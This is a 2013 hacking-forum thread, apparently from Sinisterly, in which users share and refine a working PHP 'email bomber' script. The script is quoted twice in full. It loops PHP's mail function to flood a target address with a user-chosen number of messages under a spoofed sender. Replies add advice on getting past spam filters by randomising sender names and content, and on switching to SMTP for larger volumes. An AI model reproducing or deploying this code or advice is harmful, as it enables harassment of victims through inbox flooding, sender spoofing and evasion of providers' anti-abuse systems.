Sinisterly
E-mail Bomber Script [PHP] - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: PHP (https://sinister.ly/Forum-PHP)
+--- Thread: E-mail Bomber Script [PHP] (/Thread-E-mail-Bomber-Script-PHP)

Pages: 1 2 3 4 5 6


RE: E-mail Bomber Script [PHP] - pratham - 04-23-2013

then i have one thing and also advice for you...!!

Don't waste your time in getting script use SMTP [Send Mail Transfer Protocol] to send 250MB-Unlimited mails.. :dance: Wink


RE: E-mail Bomber Script [PHP] - noize - 04-23-2013

(04-09-2013, 04:34 AM)The Alchemist Wrote:
(04-08-2013, 12:20 AM)midem2013 Wrote: "" Parse error: syntax error, unexpected '<' in /home/a2515837/public_html/cj5jl36jh64832/Email Bomber By MiDOM/EmailBMB.php on line 3 ""

Fix or something ? :O
Sent it via HOTMAIL : midomdevil@hotmail.com

or PM HERE
Here is the working script :
Code:
<html> <body> <h1> Email Bomber Script</h1> <table border=2> <form action="" method=post> <tr><td>Targat Email Address: </td><td><input type=text name=email size=30></td></tr> <tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr> <tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr> <tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr> <tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr> <tr><td><input type=submit value="Send Mail"></td></tr> </form> </table> <?php $to = 'indianhacker@example.com'; $subject = 'the subject'; $message = 'hello'; $headers = 'From: webmaster@example.com' . "\r\n" . 'Reply-To: webmaster@example.com' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); for ($i=1; $i <= 500; $i++) { mail($to, $subject, $message, $headers ); } ?></body></html>

Just a question, why using the form if then the PHP part is not interactive? How about this:

Code:
<html> <body> <h1> Email Bomber Script</h1> <table border=2> <form action="" method=post> <tr><td>Targat Email Address: </td><td><input type=text name=email size=30></td></tr> <tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr> <tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr> <tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr> <tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr> Number of emails: <input type=text name=x /> Sender: <input type=text name=sender /> <tr><td><input type=submit value="Send Mail"></td></tr> </form> </table> <?php $to = $_POST['email']; $subject = $_POST['subject']; $message = $_POST['content']; $headers = 'From: ' . $_POST['sender'] . "\r\n" . 'Reply-To: noreply@emailed.com' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); $x = $_POST['x']; for ($i=1; $i <= $x; $i++) { mail($to, $subject, $message, $headers ); } ?></body></html>

Of course I didn't care about the front-end much, just as it wasn't a wonder right before. You could also add a checkbox to ask if the user wants replies to go to the fake sender or not.

PHP Code:
if (empty($_POST['check'])) { // forward replies to hell (hell@hellonweb.com) } else { // forward replies to $sender }

That ain't a bad idea, I think, just came up to my mind.


RE: E-mail Bomber Script [PHP] - pratham - 04-24-2013

(04-23-2013, 10:45 PM)noize Wrote:
(04-09-2013, 04:34 AM)The Alchemist Wrote:
(04-08-2013, 12:20 AM)midem2013 Wrote: "" Parse error: syntax error, unexpected '<' in /home/a2515837/public_html/cj5jl36jh64832/Email Bomber By MiDOM/EmailBMB.php on line 3 ""

Fix or something ? :O
Sent it via HOTMAIL : midomdevil@hotmail.com

or PM HERE
Here is the working script :
Code:
<html> <body> <h1> Email Bomber Script</h1> <table border=2> <form action="" method=post> <tr><td>Targat Email Address: </td><td><input type=text name=email size=30></td></tr> <tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr> <tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr> <tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr> <tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr> <tr><td><input type=submit value="Send Mail"></td></tr> </form> </table> <?php $to = 'indianhacker@example.com'; $subject = 'the subject'; $message = 'hello'; $headers = 'From: webmaster@example.com' . "\r\n" . 'Reply-To: webmaster@example.com' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); for ($i=1; $i <= 500; $i++) { mail($to, $subject, $message, $headers ); } ?></body></html>

Just a question, why using the form if then the PHP part is not interactive? How about this:

Code:
<html> <body> <h1> Email Bomber Script</h1> <table border=2> <form action="" method=post> <tr><td>Targat Email Address: </td><td><input type=text name=email size=30></td></tr> <tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr> <tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr> <tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr> <tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr> Number of emails: <input type=text name=x /> Sender: <input type=text name=sender /> <tr><td><input type=submit value="Send Mail"></td></tr> </form> </table> <?php $to = $_POST['email']; $subject = $_POST['subject']; $message = $_POST['content']; $headers = 'From: ' . $_POST['sender'] . "\r\n" . 'Reply-To: noreply@emailed.com' . "\r\n" . 'X-Mailer: PHP/' . phpversion(); $x = $_POST['x']; for ($i=1; $i <= $x; $i++) { mail($to, $subject, $message, $headers ); } ?></body></html>

Of course I didn't care about the front-end much, just as it wasn't a wonder right before. You could also add a checkbox to ask if the user wants replies to go to the fake sender or not.

PHP Code:
if (empty($_POST['check'])) { // forward replies to hell (hell@hellonweb.com) } else { // forward replies to $sender }

That ain't a bad idea, I think, just came up to my mind.

yes.. i already think about that to modify.. but when i was hack SMTP and saw the configuration of SMTP.. no need to modify this script..!!
Now the SMTP is best option for sending mail.. Smile
because using SMTP we can send 250 MB-Unlimited Mails.. :dance:


RE: E-mail Bomber Script [PHP] - hackarchives - 04-25-2013

There is one problem with this script.Most of the modern email hosting companies will write all your messages together and show a number (500) or something like that besides it. Users can delete all the messages resulting in Bombing failure.

Also new users Do note that you should not send out too many email bombs otherwise your IP will be blacklisted by these email providers


RE: E-mail Bomber Script [PHP] - noize - 04-25-2013

(04-25-2013, 01:58 PM)hackarchives Wrote: There is one problem with this script.Most of the modern email hosting companies will write all your messages together and show a number (500) or something like that besides it. Users can delete all the messages resulting in Bombing failure.

Also new users Do note that you should not send out too many email bombs otherwise your IP will be blacklisted by these email providers

You're right. Though, this can be bypassed by adding $a to $sender (I don't remember if I had called "a" the number of emails to send), so to have an incremental number and different senders for every email. Or also a random sender name, maybe.


RE: E-mail Bomber Script [PHP] - hackarchives - 04-25-2013

(04-25-2013, 03:54 PM)noize Wrote:
(04-25-2013, 01:58 PM)hackarchives Wrote: There is one problem with this script.Most of the modern email hosting companies will write all your messages together and show a number (500) or something like that besides it. Users can delete all the messages resulting in Bombing failure.

Also new users Do note that you should not send out too many email bombs otherwise your IP will be blacklisted by these email providers

You're right. Though, this can be bypassed by adding $a to $sender (I don't remember if I had called "a" the number of emails to send), so to have an incremental number and different senders for every email. Or also a random sender name, maybe.

MOdern anti spam systems also pickup up same content. Content should also be randomized.Check out my signature Wink


RE: E-mail Bomber Script [PHP] - noize - 04-25-2013

(04-25-2013, 04:04 PM)hackarchives Wrote:
(04-25-2013, 03:54 PM)noize Wrote:
(04-25-2013, 01:58 PM)hackarchives Wrote: There is one problem with this script.Most of the modern email hosting companies will write all your messages together and show a number (500) or something like that besides it. Users can delete all the messages resulting in Bombing failure.

Also new users Do note that you should not send out too many email bombs otherwise your IP will be blacklisted by these email providers

You're right. Though, this can be bypassed by adding $a to $sender (I don't remember if I had called "a" the number of emails to send), so to have an incremental number and different senders for every email. Or also a random sender name, maybe.

MOdern anti spam systems also pickup up same content. Content should also be randomized.Check out my signature Wink

Yes, of course. I already had a look at that thread. :yes:


RE: E-mail Bomber Script [PHP] - pratham - 04-26-2013

okey brothers.. Will try to remove bugs Smile

otherwise you can also modify it.. Smile


RE: E-mail Bomber Script [PHP] - pratham - 04-26-2013

okey brothers.. Will try to remove bugs Smile

otherwise you can also modify it.. Smile


RE: E-mail Bomber Script [PHP] - TheDarkNight - 05-03-2013

May I let you know most host would remove this and also sometimes they limit there out going emails and also most of the time the emails will turn up in the junk email.